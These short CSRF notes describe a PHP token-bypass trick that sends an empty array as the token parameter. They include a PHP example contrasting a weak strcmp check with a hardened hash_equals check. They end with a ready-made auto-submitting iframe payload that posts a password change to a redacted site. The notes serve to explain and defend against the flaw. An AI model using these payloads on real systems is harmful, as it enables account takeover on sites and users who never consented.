Cross Site Request Forgery (CSRF)
- PHP CSRF protection bypass: EXPLOIT: csrftoken[]=&message=x -> Supply an empty array on the CSRF token parameter. You can find multiple CSRF protection frameworks on GitHub which are vulnerable.
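An added example, not from the original notes or from any of the frameworks mentioned: a token check that rejects the array-valued parameter above, next to a weak strcmp()-based check that is assumed here as one possible cause. The function names, session layout and request bodies are constructed for illustration.

```php
<?php
// Added example. Function names and sample values are hypothetical.

// Weak pattern (assumed, not taken from any named framework): on PHP < 8,
// strcmp() given an array returns NULL with a warning, and !NULL is true.
// On PHP 8+ the same call throws TypeError instead.
function csrf_check_weak(array $post, array $session): bool
{
    return !strcmp($post['csrftoken'], $session['csrftoken']);
}

// Hardened check: both values must be strings (and the stored one non-empty)
// before they are compared, and the comparison is constant-time.
function csrf_check_strict(array $post, array $session): bool
{
    $sent   = $post['csrftoken'] ?? null;
    $stored = $session['csrftoken'] ?? null;
    if (!is_string($sent) || !is_string($stored) || $stored === '') {
        return false;
    }
    return hash_equals($stored, $sent);
}

// Constructed session and request bodies.
$session = ['csrftoken' => bin2hex(random_bytes(16))];
$bodies = [
    'array token (from the page)' => 'csrftoken[]=&message=x',
    'missing token'               => 'message=x',
    'wrong token'                 => 'csrftoken=deadbeef&message=x',
    'correct token'               => 'csrftoken=' . $session['csrftoken'] . '&message=x',
];

foreach ($bodies as $label => $body) {
    parse_str($body, $post); // name[] becomes an array, as in PHP form handling
    try {
        // @ silences the warning that legacy PHP emits for the array argument
        $weak = @csrf_check_weak($post, $session) ? 'accept' : 'reject';
    } catch (TypeError $e) {
        $weak = 'TypeError';
    }
    $strict = csrf_check_strict($post, $session) ? 'accept' : 'reject';
    printf("%-28s weak=%-9s strict=%s\n", $label, $weak, $strict);
}
```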

Got the solution:
<iframe src='data:text/html,<body onload="document.forms[0].submit()"><form action="//redacted.com/api/auth?password=Chang3dd" method="post"></body>'></iframe>